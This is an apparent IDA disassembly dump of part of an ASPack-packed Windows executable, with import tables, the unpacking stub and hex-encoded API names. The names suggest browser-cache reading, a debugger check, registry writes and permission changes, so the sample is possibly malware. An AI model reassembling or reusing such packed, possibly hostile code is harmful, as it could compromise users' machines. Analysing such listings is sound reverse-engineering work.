dword_447528 dd 73D96FEBh dword_44752C dd 73D91C28h dword_447530 dd 73D92B86h dword_447534 dd 73D9A3B0h dword_447538 dd 73D9B9A2h dword_44753C dd 73D91F60h dword_447540 dd 73D9D320h dword_447544 dd 73D9D340h dword_447548 dd 73D9D5E0h dword_44754C dd 73D9242Ch dword_447550 dd 73D9DBAFh dword_447554 dd 73D92226h dword_447558 dd 73D9E5C5h dword_44755C dd 73D9DBA2h dword_447560 dd 73D9E61Eh dword_447564 dd 73D9E65Ch dword_447568 dd 73D9E69Ch dword_44756C dd 73D9F24Ch dd 0
dd 79530046h, 6C6C4173h, 7453636Fh, 676E6972h, 0
dd 69460015h, 6946646Eh, 55747372h, 61436C72h, 45656863h
dd 7972746Eh, 41h, 6946001Ch, 654E646Eh, 72557478h, 6361436Ch
dd 6E456568h, 41797274h, 0
dd 6F43006Ah, 61657243h, 6E496574h, 6E617473h, 6563h, 4C43007Ch
dd 46444953h, 536D6F72h, 6E697274h, 67h, 6F430058h, 74696E49h
dd 696C6169h, 657Ah, 6F43005Bh, 6E696E55h, 61697469h, 657A696Ch
dd 0
dd 78450081h, 72507469h, 7365636Fh, 73h, 78450083h, 646E6170h
dd 69766E45h, 6D6E6F72h, 53746E65h, 6E697274h, 417367h
dd 654700CAh, 6D6F4374h, 646E616Dh, 656E694Ch, 41h, 654700DEh
dd 72754374h, 746E6572h, 636F7250h, 49737365h, 64h, 654700E0h
dd 72754374h, 746E6572h, 65726854h, 64496461h, 0
dd 654700F8h, 6C694674h, 7A695365h, 65h, 654700FAh, 6C694674h
dd 6D695465h, 65h, 65470100h, 73614C74h, 72724574h, 726Fh
dd 6547010Ah, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
dd 6547010Ch, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 6C43001Bh
dd 4865736Fh, 6C646E61h, 65h, 65470122h, 6F725074h, 64644163h
dd 73736572h, 0
dd 65470124h, 6F725074h, 73736563h, 70616548h, 0
dd 6547013Fh, 73795374h, 446D6574h, 63657269h, 79726F74h
dd 41h, 6547014Dh, 6D655474h, 74615070h, 4168h, 65470155h
dd 63695474h, 756F436Bh, 746Eh, 6547015Ch, 72655674h, 6E6F6973h
dd 0
dd 6547015Dh, 72655674h, 6E6F6973h, 417845h, 6547015Fh
dd 6C6F5674h, 49656D75h, 726F666Eh, 6974616Dh, 416E6Fh
dd 65470165h, 6E695774h, 73776F64h, 65726944h, 726F7463h
dd 4179h, 6C470168h, 6C61626Fh, 41646441h, 416D6F74h, 0
dd 6C47016Ch, 6C61626Fh, 656C6544h, 74416574h, 6D6Fh, 6C47016Dh
dd 6C61626Fh, 646E6946h, 6D6F7441h, 41h, 6C470176h, 6C61626Fh
dd 6F6D654Dh, 74537972h, 73757461h, 0
dd 6F430025h, 69467970h, 41656Ch, 6E490194h, 6C726574h
dd 656B636Fh, 636E4964h, 656D6572h, 746Eh, 73490198h, 52646142h
dd 50646165h, 7274h, 7349019Bh, 57646142h, 65746972h, 727450h
dd 7349019Eh, 75626544h, 72656767h, 73657250h, 746E65h
dd 6F4C01A7h, 694C6461h, 72617262h, 4179h, 6F4C01ADh, 416C6163h
dd 636F6C6Ch, 0
dd 6F4C01B1h, 466C6163h, 656572h, 704F01D2h, 754D6E65h
dd 41786574h, 0
dd 704F01D4h, 72506E65h, 7365636Fh, 73h, 72430031h, 65746165h
dd 656C6946h, 41h, 655201FAh, 69466461h, 656Ch, 7452020Eh
dd 776E556Ch, 646E69h, 7452020Fh, 72655A6Ch, 6D654D6Fh
dd 79726Fh, 6553023Ah, 6C694674h, 696F5065h, 7265746Eh
dd 0
dd 6553023Ch, 6C694674h, 6D695465h, 65h, 7243003Ch, 65746165h
dd 6574754Dh, 4178h, 6C530264h, 706565h, 6554026Ch, 6E696D72h
dd 50657461h, 65636F72h, 7373h, 69560285h, 61757472h, 6C6C416Ch
dd 636Fh, 69560287h, 61757472h, 6572466Ch, 65h, 6956028Ch
dd 61757472h, 6575516Ch, 7972h, 72430041h, 65746165h, 636F7250h
dd 41737365h, 0
dd 69570297h, 68436564h, 6F547261h, 746C754Dh, 74794269h
dd 65h, 69570298h, 6578456Eh, 63h, 725702A2h, 46657469h
dd 656C69h, 736C02C9h, 656C7274h, 416Eh, 736C02CAh, 656C7274h
dd 576Eh, 72430047h, 65746165h, 65726854h, 6461h, 65440054h
dd 6574656Ch, 656C6946h, 41h, 65470066h, 6E695774h, 54776F64h
dd 41747865h, 0
dd 6547006Bh, 6E695774h, 52776F64h, 746365h, 69460070h
dd 6957646Eh, 776F646Eh, 41h, 65470074h, 6E695774h, 776F64h
dd 6547000Eh, 616C4374h, 614E7373h, 41656Dh, 655300C4h
dd 636F4674h, 7375h, 654700C9h, 726F4674h, 6F726765h, 57646E75h
dd 6F646E69h, 77h, 6F4C0016h, 75436461h, 726F7372h, 41h
dd 6F4C0018h, 63496461h, 416E6Fh, 655300FEh, 6D695474h
dd 7265h, 65520002h, 74736967h, 6C437265h, 41737361h, 0
dd 654D0134h, 67617373h, 786F4265h, 41h, 65470020h, 73654D74h
dd 65676173h, 41h, 65470159h, 6E695774h, 4C776F64h, 41676E6Fh
dd 0
dd 6553015Bh, 6E695774h, 4C776F64h, 41676E6Fh, 0
dd 7243015Eh, 65746165h, 6B736544h, 41706F74h, 0
dd 65530165h, 72685474h, 44646165h, 746B7365h, 706Fh, 65470166h
dd 72685474h, 44646165h, 746B7365h, 706Fh, 72540024h, 6C736E61h
dd 4D657461h, 61737365h, 6567h, 69440025h, 74617073h, 654D6863h
dd 67617373h, 4165h, 65530030h, 654D646Eh, 67617373h, 4165h
dd 737701EAh, 6E697270h, 416674h, 6F50003Dh, 75517473h
dd 654D7469h, 67617373h, 65h, 6853004Bh, 6957776Fh, 776F646Eh
dd 0
dd 7243004Fh, 65746165h, 646E6957h, 7845776Fh, 41h, 65440051h
dd 6F727473h, 6E695779h, 776F64h, 6F4D0056h, 69576576h
dd 776F646Eh, 0
dd 6544005Bh, 6E695766h, 50776F64h, 41636F72h, 0
dd 6143005Dh, 69576C6Ch, 776F646Eh, 636F7250h, 41h, 65470089h
dd 6F745374h, 624F6B63h, 7463656Ah, 0
dd 655300CAh, 436B4274h, 726F6C6Fh, 0
dd 655300DDh, 78655474h, 6C6F4374h, 726Fh, 724300FAh, 65746165h
dd 73757242h, 646E4968h, 63657269h, 74h, 7243001Ch, 65746165h
dd 746E6F46h, 41h, 704F0018h, 72506E65h, 7365636Fh, 6B6F5473h
dd 6E65h, 6547001Ah, 6B6F5474h, 6E496E65h, 6D726F66h, 6F697461h
dd 6Eh, 65520171h, 65724367h, 4B657461h, 78457965h, 41h
dd 65520174h, 6F6C4367h, 654B6573h, 79h, 65520179h, 65704F67h
dd 79654B6Eh, 417845h, 65520184h, 65755167h, 61567972h
dd 4565756Ch, 4178h, 65520190h, 74655367h, 756C6156h, 41784565h
dd 0
dd 654701CAh, 63655374h, 74697275h, 666E4979h, 6Fh, 655301CDh
dd 63655374h, 74697275h, 666E4979h, 6Fh, 655301D4h, 746E4574h
dd 73656972h, 63416E49h, 416Ch, 6547004Ah, 64695374h, 6E656449h
dd 69666974h, 75417265h, 726F6874h, 797469h, 6547004Bh
dd 64695374h, 41627553h, 6F687475h, 79746972h, 0
dd 6547004Ch, 64695374h, 41627553h, 6F687475h, 79746972h
dd 6E756F43h, 74h, 695F00E8h, 616F74h, 5F5F0018h, 4D746547h
dd 416E6961h, 736772h, 735F0181h, 7065656Ch, 0
dd 735F01A6h, 63697274h, 706Dh, 626101F6h, 73h, 7865020Ah
dd 7469h, 656D0253h, 706D636Dh, 0
dd 656D0254h, 7970636Dh, 0
dd 656D0256h, 7465736Dh, 0
dd 61720260h, 657369h, 61720261h, 646Eh, 6973026Ah, 6C616E67h
dd 0
dd 7073026Dh, 746E6972h, 66h, 7273026Fh, 646E61h, 73730270h
dd 666E6163h, 0
dd 74730271h, 74616372h, 0
dd 74730272h, 72686372h, 0
dd 7473027Bh, 6D636E72h, 70h, 41454C4Fh, 32335455h, 4C4C442Eh
dd 0
dd offset off_447000
aWininet_dll db 'WININET.DLL',0
dd offset off_447014
dd offset off_447014
aOle32_dll db 'ole32.DLL',0
align 4
dd offset off_447028
dd offset off_447028
dd offset off_447028
dd offset off_447028
aKernel32_dll_2 db 'KERNEL32.DLL',0
align 4
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
dd offset off_44703C
aUser32_dll_0 db 'USER32.DLL',0
align 4
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
dd offset off_447050
aGdi32_dll db 'GDI32.DLL',0
align 4
dd offset off_447064
dd offset off_447064
dd offset off_447064
dd offset off_447064
dd offset off_447064
aAdvapi32_dll_1 db 'ADVAPI32.DLL',0
align 4
dd offset off_447078
dd offset off_447078
dd offset off_447078
dd offset off_447078
dd offset off_447078
dd offset off_447078
dd offset off_447078
dd offset off_447078
dd offset off_447078
dd offset off_447078
dd offset off_447078
dd offset off_447078
dd offset off_447078
aCrtdll_dll db 'CRTDLL.DLL',0
align 4
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
dd offset off_44708C
align 1000h
_idata ends
; Section 5. (virtual address 00049000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00049000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_aspack segment para public 'DATA' use32
assume cs:_aspack
;org 449000h
db 90h
; =============== S U B R O U T I N E =======================================
public start
start proc near
pusha
call sub_449577
jmp short loc_449055
; ---------------------------------------------------------------------------
align 4
dd 0D9000000h, 4873h, 90DB8700h, 6 dup(0)
dd 4900001h, 0AD000000h, 0AB000000h, 809A5100h, 809AE47Ch
dd 7Ch, 3 dup(0)
db 0
; ---------------------------------------------------------------------------
loc_449055: ; CODE XREF: start+6�j
mov ebx, offset dword_4439A4
add ebx, ebp
sub ebx, ss:dword_4439D5[ebp]
cmp ss:dword_444804[ebp], 0
mov ss:dword_444804[ebp], ebx
jnz loc_4494DB
lea eax, dword_44480C[ebp]
push eax
call ss:dword_444918[ebp]
mov ss:dword_444808[ebp], eax
mov edi, eax
lea ebx, dword_444819[ebp]
push ebx
push eax
call ss:dword_444914[ebp]
mov ss:dword_4439E1[ebp], eax
lea ebx, dword_444826[ebp]
push ebx
push edi
call ss:dword_444914[ebp]
mov ss:dword_4439E5[ebp], eax
lea eax, dword_443B72[ebp]
jmp eax
; ---------------------------------------------------------------------------
align 10h
dd 40h, 2 dup(0)
dd 70000000h, 12190004h, 2 dup(0)
dd 10000000h, 0B6F80000h, 0B0000000h, 0BB040003h, 70000000h
dd 10540004h, 36h dup(0)
dd 9D8B0000h, 443A66h, 0A74DB0Bh, 8587038Bh, 443A6Ah, 0B58D0389h
dd 443A82h, 0F003E83h, 11D84h, 82B58D00h, 6A00443Ah, 10006804h
dd 680000h, 6A000018h, 0E195FF00h, 89004439h, 4439DD85h
dd 4468B00h, 10E05h, 68046A00h, 1000h, 0FF006A50h, 4439E195h
dd 0D9858900h, 56004439h, 9D031E8Bh, 444804h, 39DDB5FFh
dd 76FF0044h, 0E8535004h, 339h, 39D4BD80h, 75000044h, 0D485FE5Ch
dd 8B004439h, 4BD033Eh, 0FF004448h, 0C307C637h, 78FD7FFh
dd 53565150h, 0E983C88Bh, 0D9B58B06h, 33004439h, 74C90BDBh
dd 0E83CAC2Ch, 0EB0A74h, 474E93Ch, 0EDEB4943h, 0EB068Bh
dd 75013E80h, 0C10024F3h, 0C32B18C0h, 0C3830689h, 4C68305h
dd 0EB05E983h, 595E5BD0h, 8BC88B58h, 4BD033Eh, 8B004448h
dd 4439D9B5h, 2F9C100h, 0C88BA5F3h, 0F303E183h, 685EA4h
dd 6A000080h, 0D9B5FF00h, 0FF004439h, 4439E595h, 8C68300h
dd 0F003E83h, 0FFFF2885h, 800068FFh, 6A0000h, 39DDB5FFh
dd 95FF0044h, 4439E5h, 3A669D8Bh, 0DB0B0044h, 38B0874h
dd 3A6A8587h, 958B0044h, 444804h, 3A62858Bh, 0D02B0044h
dd 0C28B7974h, 3310E8C1h, 6EB58BDBh, 300443Ah, 444804B5h
dd 3E8300h, 4E8B6174h, 8E98304h, 3E8BE9D1h, 4804BD03h
dd 0C6830044h, 1E8B6608h, 830CEBC1h, 0C7401FBh, 7402FB83h
dd 3FB8316h, 2CEB2074h, 811E8B66h, 0FFFE3h, 4016600h, 661DEB1Fh
dd 0E3811E8Bh, 0FFFh, 1F140166h, 8B660EEBh, 0FFE3811Eh
dd 100000Fh, 0EB1F14h, 0FF0E8366h, 0E202C683h, 8B9AEBB4h
dd 44480495h, 0ADB58B00h, 0B004439h, 31174F6h, 0C00BADF2h
dd 0C2030A74h, 0AD66F88Bh, 0F1EBAB66h, 3A72B58Bh, 958B0044h
dd 444804h, 468BF203h, 0FC0850Ch, 10A84h, 8BC20300h, 95FF50D8h
dd 444918h, 775C085h, 1C95FF53h, 89004449h, 4439B185h
dd 0B585C700h, 4439h, 8B000000h, 44480495h, 85068B00h
dd 8B0375C0h, 0C2031046h, 39B58503h, 188B0044h, 3107E8Bh
dd 0B5BD03FAh, 85004439h, 0A2840FDBh, 0F7000000h, 0C3h
dd 3047580h, 534343DAh, 0FFFFE381h, 0FF537FFFh, 4439B1B5h
dd 1495FF00h, 85004449h, 6F755BC0h, 0C3F7h, 19758000h
dd 0C468B57h, 48048503h, 53500044h, 487F858Dh, 57500044h
dd 99E9h, 0FFE38100h, 8B7FFFFFh, 44480885h, 0B1853900h
dd 75004439h, 0D38B5724h, 2E2C14Ah, 39B19D8Bh, 7B8B0044h
dd 3B7C8B3Ch, 3B5C0378h, 13048B1Ch, 39B18503h, 0EB5F0044h
dd 468B5716h, 485030Ch, 50004448h, 0D0858D53h, 50004448h
dd 894BEB57h, 0B5858307h, 4004439h, 0FFFF32E9h, 890689FFh
dd 46890C46h, 14C68310h, 4804958Bh, 0EBE90044h
db 0FEh, 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_4494DB: ; CODE XREF: start+6E�j
mov eax, ss:dword_443A76[ebp]
push eax
add eax, ss:dword_444804[ebp]
pop ecx
or ecx, ecx
mov ss:dword_443EA1[ebp], eax
popa
jnz short loc_4494FC
mov eax, 1
retn 0Ch
; ---------------------------------------------------------------------------
loc_4494FC: ; CODE XREF: start+4F1�j
push offset sub_401219
retn
start endp
; ---------------------------------------------------------------------------
aLeHd db '‹…',8,'HD',0
aNnahd db 'AHD',0
dw 5051h
dd 491495FFh, 85890044h, 4439EDh, 4851858Dh, 0FF500044h
dd 44491C95h, 4D858900h, 8D004448h, 44485C8Dh, 0FF505100h
dd 44491495h, 0F1858900h, 8B004439h, 44484D85h, 688D8D00h
dd 51004448h, 1495FF50h, 0FF004449h, 10C483D0h, 8D306A5Fh
dd 4448729Dh, 6A575300h, 0F195FF00h, 6A004439h, 0ED95FFFFh
db 39h, 44h, 0
; =============== S U B R O U T I N E =======================================
sub_449577 proc near ; CODE XREF: start+1�p
mov ebp, [esp+0]
sub ebp, offset byte_4439AB
retn
sub_449577 endp
; ---------------------------------------------------------------------------
db 8Bh, 44h, 24h
dd 54EC8110h, 8D000003h, 5004244Ch, 3A8E8h, 248C8B00h
dd 35Ch, 5824948Bh, 51000003h, 244C8D52h, 40DE80Ch, 0C0840000h
dd 0C8830A75h, 54C481FFh, 0C3000003h, 60248C8Bh, 8D000003h
dd 51502404h, 0C244C8Dh, 5EFE8h, 75C08400h, 0FFC8830Ah
dd 354C481h, 8BC30000h, 0C4812404h, 354h, 10C2h, 4030201h
dd 8070605h, 100E0C0Ah, 201C1814h, 40383028h, 80706050h
dd 0E0C0A0h, 0
dd 1000000h, 2010101h, 3020202h, 4030303h, 5040404h, 50505h
dd 1000000h, 3020201h, 5040403h, 7060605h, 9080807h, 0B0A0A09h
dd 0D0C0C0Bh, 0F0E0E0Dh, 1110100Fh, 3 dup(11111111h), 12121211h
dd 12121212h, 0D18B5112h, 8B956h, 39570000h, 3572044Ah
dd 0FFF8BE53h, 28BFFFFh, 8840188Ah, 890C245Ch, 8428B02h
dd 0C247C8Bh, 8108E0C1h, 0FFE7h, 8BC70B00h, 0FE03047Ah
dd 8B084289h, 47A89C7h, 0D273C13Bh, 4728B5Bh, 8B08428Bh
dd 2B10247Ch, 0B9E8D3CEh, 18h, 0FF25CF2Bh, 0D300FFFFh
dd 5FF703E8h, 5E047289h, 4C259h, 424448Bh, 824548Bh, 848189h
dd 91890000h, 88h, 8982048Dh, 8C81h, 1000500h, 8C20000h
dd 98EC8100h, 53000000h, 0D18B5655h, 0FB957h, 0AA8B0000h
dd 84h, 7C8DC033h, 0F6332C24h, 0BC8BABF3h, 0AC24h, 89EE3B00h
dd 76202454h, 8AC93315h, 5C8B380Ch, 4C8D288Ch, 4043288Ch
dd 1989C53Bh, 17B9EB72h, 89000000h, 89282474h, 72890472h
dd 24748944h, 89FF3368h, 0C71C2474h, 1102444h, 89000000h
dd 8D18244Ch, 7489086Ah, 448B1424h, 0E0D32C34h, 0FF81F803h
dd 1000000h, 24247C89h, 8E870Fh, 448B0000h, 7D892834h
dd 3C5D8B00h, 0F983C303h, 40458910h, 6C344489h, 758B4D7Ch
dd 24448B00h, 245C8B10h, 8CBA8B1Ch, 0C1000000h, 0CE8B10EEh
dd 0FF25h, 3CB2B00h, 8BD88AFBh, 89FB8AD1h, 8B1C2474h, 24748BC3h
dd 10E0C114h, 0C1C38B66h, 0ABF302E9h, 548BCA8Bh, 0E1832024h
dd 8BAAF303h, 8B24247Ch, 8B18244Ch, 83102444h, 494004C6h
dd 8304C583h, 448909F9h, 4C891024h, 74891824h, 8D0F1424h
dd 0FFFFFF62h, 0FF81h, 0F740100h, 325D5E5Fh, 0C4815BC0h
dd 98h, 8B0004C2h, 8482h, 85C93300h, 8B3B76C0h, 0AC24B4h
dd 48A0000h, 74C08431h, 88BA8B22h, 25000000h, 0FFh, 6884448Bh
dd 33870C89h, 31048AC0h, 68847C8Bh, 6884448Dh, 8B388947h
dd 8482h, 0C83B4100h, 5E5FCC72h, 5B01B05Dh, 98C481h, 4C20000h
dd 56535100h, 8B57F18Bh, 4788306h, 8B307208h, 41118A08h
dd 0C245488h, 488B0889h, 24548B08h, 8E1C10Ch, 0FFE281h
dd 0CA0B0000h, 8304508Bh, 4889F8C2h, 89CA8B08h, 0F9830450h
dd 8BD07308h, 408B0450h, 8B908h, 0CA2B0000h, 4E8BE8D3h
dd 0FE002524h, 0C13B00FFh, 968B1473h, 8Ch, 0E9C1C88Bh
dd 8ADB3310h, 0D38B111Ch, 463B3BEBh, 3B0A732Ch, 0D21B2846h
dd 0EB0AC283h, 30463B2Ch, 0BBA0773h, 0EB000000h, 34463B20h
dd 0CBA0773h, 0EB000000h, 38463B14h, 0DBA0773h, 0EB000000h
dd 3C463B08h, 0C283D21Bh, 8B0E8B0Fh, 0FA030479h, 8B047989h
dd 18B9961Ch, 2B000000h, 5FCA2BC3h, 4C8BE8D3h, 0C1034496h
dd 888E8Bh, 5B5E0000h, 5981048Bh, 575653C3h, 0D233F98Bh
dd 0B78DC033h, 268h, 0E8561689h, 25Eh, 0C7308C8Ah, 5E00443Fh
dd 1BBh, 4C68300h, 0D303E3D3h, 3AF88340h, 448BDE72h, 4F8D1024h
dd 0D1685010h, 0E8000002h, 0FFFFFD48h, 8D1C6A50h, 0A08Fh
dd 0FD3AE800h, 6A50FFFFh, 308F8D08h, 0E8000001h, 0FFFFFD2Ch
dd 8D136A50h, 1C08Fh, 0FD1EE800h, 8789FFFFh, 260h, 0F5055E5Fh
dd 5B000002h, 8B0004C2h, 8B082444h, 244C8BD1h, 2895704h
dd 8904428Dh, 440C708h, 20h, 89104289h, 0A082h, 30828900h
dd 89000001h, 1C082h, 0B9C03300h, 0BDh, 2508289h, 82890000h
dd 254h, 2588289h, 0BA8B0000h, 260h, 25C8289h, 0ABF30000h
dd 0E8AACA8Bh, 4, 8C25Fh, 30CEC81h, 8B530000h, 8D5655D9h
dd 6A57046Bh, 0E8CD8B01h, 0FFFFFC29h, 0E75C085h, 260BB8Bh
dd 0BDB90000h, 0F3000000h, 0F633AAABh, 0CD8B046Ah, 0FFFC0CE8h
dd 344488FFh, 0FE834610h, 8DED7213h, 1C0BBh, 24448D00h
dd 0CF8B5010h, 0FFFC80E8h, 75C084FFh, 5D5E5F0Bh, 0CC4815Bh
dd 0C3000003h, 0CF8BF633h, 0FFFDE4E8h, 10F883FFh, 8B8B1573h
dd 260h, 231148Ah, 0FE280D0h, 24345488h, 7560EB46h, 8B026A28h
dd 0FBB3E8CDh, 0C083FFFFh, 7EC08503h, 0F5FE814Eh, 7D000002h
dd 344C8A52h, 4C884823h, 85462434h, 0EBEA7FC0h, 11F88336h
dd 36A0E75h, 86E8CD8Bh, 83FFFFFBh, 0CEB03C0h, 0CD8B076Ah
dd 0FFFB78E8h, 0BC083FFh, 137EC085h, 2F5FE81h, 177D0000h
dd 243444C6h, 85484600h, 81ED7FC0h, 2F5FEh, 738C0F00h
dd 8DFFFFFFh, 8D242454h, 0E852104Bh, 0FFFFFBD5h, 0B75C084h
dd 5B5D5E5Fh, 30CC481h, 8DC30000h, 2F52484h, 8B8D0000h
dd 0A0h, 0FBB3E850h, 0C084FFFFh, 5E5F0B75h, 0C4815B5Dh
dd 30Ch, 248C8DC3h, 311h, 308B8D51h, 0E8000001h, 0FFFFFB91h
dd 0B75C084h, 5B5D5E5Fh, 30CC481h, 0C6C30000h, 26483h
dd 0C0330000h, 1104BC80h, 3000003h, 83400875h, 0F07208F8h
dd 83C607EBh, 264h, 60838B01h, 8D000002h, 0BE24244Ch, 2F5h
dd 1088118Ah, 754E4140h, 5D5E5FF7h, 815B01B0h, 30CC4h
dd 1E8C300h, 90000000h, 5BEE815Eh, 0C3004445h, 8B14EC83h
dd 531C2444h, 0C75655h, 0
dd 2424448Bh, 85FF3357h, 89F18BC0h, 0F10247Ch, 25B86h
dd 104E8D00h, 0FFFC7CE8h, 1003DFFh, 13730000h, 1880E8Bh
dd 47410E8Bh, 7C890E89h, 29E91024h, 3D000002h, 2D0h, 213830Fh
dd 50000h, 8BFFFFFFh, 7E083E8h, 8D03EDC1h, 0F8830250h
dd 24548907h, 94850F14h, 8D000000h, 0A08Eh, 0FC2FE800h
dd 4E8BFFFFh, 56DB3308h, 0FFFF6DE8h, 309C8AFFh, 443FABh
dd 8F9835Eh, 4E8B3272h, 41118A04h, 18245488h, 8B044E89h
dd 548B0C4Eh, 0E1C11824h, 0FFE28108h, 0B000000h, 8568BCAh
dd 89F8C283h, 0CA8B0C4Eh, 83085689h, 0CE7308F9h, 8B087E8Bh
dd 8B90C56h, 2B000000h, 0D3FB03CFh, 18B9EAh, 7E890000h
dd 81CB2B08h, 0FFFFFFE2h, 33EAD300h, 3E856C9h, 8AFFFFFFh
dd 3F8F308Ch, 8B5E0044h, 3142444h, 89C103CAh, 8A142444h
dd 26486h, 0AE9C8B00h, 268h, 0E856D233h, 0FFFFFEDAh, 0C735948Ah
dd 5E00443Fh, 0FA8BC084h, 0FF837674h, 8B717203h, 6F8D0846h
dd 8F883FDh, 468B3172h, 0C568B04h, 8A08E2C1h, 4C884008h
dd 4E8B1C24h, 4468908h, 1C24448Bh, 0FF25h, 0F8C18300h
dd 0C18BD00Bh, 8908F883h, 4E890C56h, 8BCF7308h, 7E8B0846h
dd 8B90Ch, 0C82B0000h, 0EFD3C503h, 18B9h, 8468900h, 0E781CD2Bh
dd 0FFFFFFh, 8E8DEFD3h, 130h, 0FFFB14E8h, 8DC303FFh, 5BEBF81Ch
dd 8087E83h, 468B3172h, 0C568B04h, 8A08E2C1h, 4C884008h
dd 4E8B2024h, 4468908h, 2024448Bh, 0FF25h, 0F8C18300h
dd 0C18BD00Bh, 8908F883h, 4E890C56h, 8BCF7308h, 468B0856h
dd 8B90Ch, 0CA2B0000h, 0E8D3D703h, 18B9h, 8568900h, 0FF25CF2Bh
dd 0D300FFFFh, 83D803E8h, 1A7303FBh, 509E8C8Bh, 85000002h
dd 8B3074DBh, 25096h, 9E948900h, 250h, 868B1BEBh, 254h
dd 250968Bh, 4B8D0000h, 588689FDh, 89000002h, 25496h, 508E8900h
dd 8B000002h, 247C8B06h, 148D4114h, 89C23B38h, 8B107316h
dd 40D12BD0h, 5088128Ah, 3B168BFFh, 8BF072C2h, 3102444h
dd 244489C7h, 0EBF88B10h, 0E8CE8B0Bh, 0FFFFFBF0h, 1C74C084h
dd 28247C3Bh, 0FDAB820Fh, 448BFFFFh, 38892C24h, 0B05D5E5Fh
dd 0C4835B01h, 8C214h, 325D5E5Fh, 0C4835BC0h, 8C214h, 0
dd 8, 400000h, 7C800000h, 6E72656Bh, 32336C65h, 6C6C642Eh
dd 72695600h, 6C617574h, 6F6C6C41h, 69560063h, 61757472h
dd 6572466Ch, 69560065h, 61757472h, 6F72506Ch, 74636574h
dd 69784500h, 6F725074h, 73736563h, 0
dd 65737500h, 2E323372h, 6C6C64h, 7373654Dh, 42656761h
dd 41786Fh, 72707377h, 66746E69h, 4F4C0041h, 52454441h
dd 52524520h, 5400524Fh, 70206568h, 65636F72h, 65727564h
dd 746E6520h, 70207972h, 746E696Fh, 20732520h, 6C756F63h
dd 6F6E2064h, 65622074h, 636F6C20h, 64657461h, 206E6920h
dd 20656874h, 616E7964h, 2063696Dh, 6B6E696Ch, 62696C20h
dd 79726172h, 732520h, 20656854h, 6964726Fh, 206C616Eh
dd 63207525h, 646C756Fh, 746F6E20h, 20656220h, 61636F6Ch
dd 20646574h, 74206E69h, 64206568h, 6D616E79h, 6C206369h
dd 206B6E69h, 7262696Ch, 20797261h, 90007325h, 7C80ADA0h
dd 7C80B6A1h, 7C801D77h, 0
aKernel32_dll_3 db 'kernel32.dll',0
db 2 dup(0), 47h
aEtprocaddress db 'etProcAddress',0
align 10h
aGetmodulehandl db 'GetModuleHandleA',0
db 2 dup(0), 4Ch
aOadlibrarya db 'oadLibraryA',0
dd 3 dup(0)
dd 49F80h, 49F70h, 3 dup(0)
dd 4A074h, 4A0C4h, 3 dup(0)
dd 4A081h, 4A0CCh, 3 dup(0)
dd 4A08Dh, 4A0D4h, 3 dup(0)
dd 4A097h, 4A0DCh, 3 dup(0)
dd 4A0A2h, 4A0E4h, 3 dup(0)
dd 4A0ACh, 4A0ECh, 3 dup(0)
dd 4A0B9h, 4A0F4h, 5 dup(0)
aOleaut32_dll db 'oleaut32.dll',0
aWininet_dll_0 db 'wininet.dll',0
aOle32_dll_0 db 'ole32.dll',0
aUser32_dll_1 db 'user32.dll',0
aGdi32_dll_0 db 'gdi32.dll',0
aAdvapi32_dll_2 db 'advapi32.dll',0
aCrtdll_dll_0 db 'crtdll.dll',0
dd 77124C05h, 0
aB_1 db '=ÞÂB',0
align 4
dd 774FFAC3h, 0
aC_0 db '+!C~',0
align 4
dd 77F161D1h, 0
aSwW db 'SwÝw',0
align 4
aIoS db 'ëoÙs',0
align 4
db 0
align 2
aSysallocstring db 'SysAllocString',0
db 2 dup(0), 46h
aIndfirsturlcac db 'indFirstUrlCacheEntryA',0
align 4
dd 436F4300h, 74616572h, 736E4965h, 636E6174h, 65h, 57746547h
dd 6F646E69h, 78655477h, 4174h, 74654700h, 636F7453h, 6A624F6Bh
dd 746365h, 704F0000h, 72506E65h, 7365636Fh, 6B6F5473h
dd 6E65h, 74695F00h, 616Fh, 3A2h dup(0)
_aspack ends
; Section 7. (virtual address 0004C000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0004C000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 44C000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start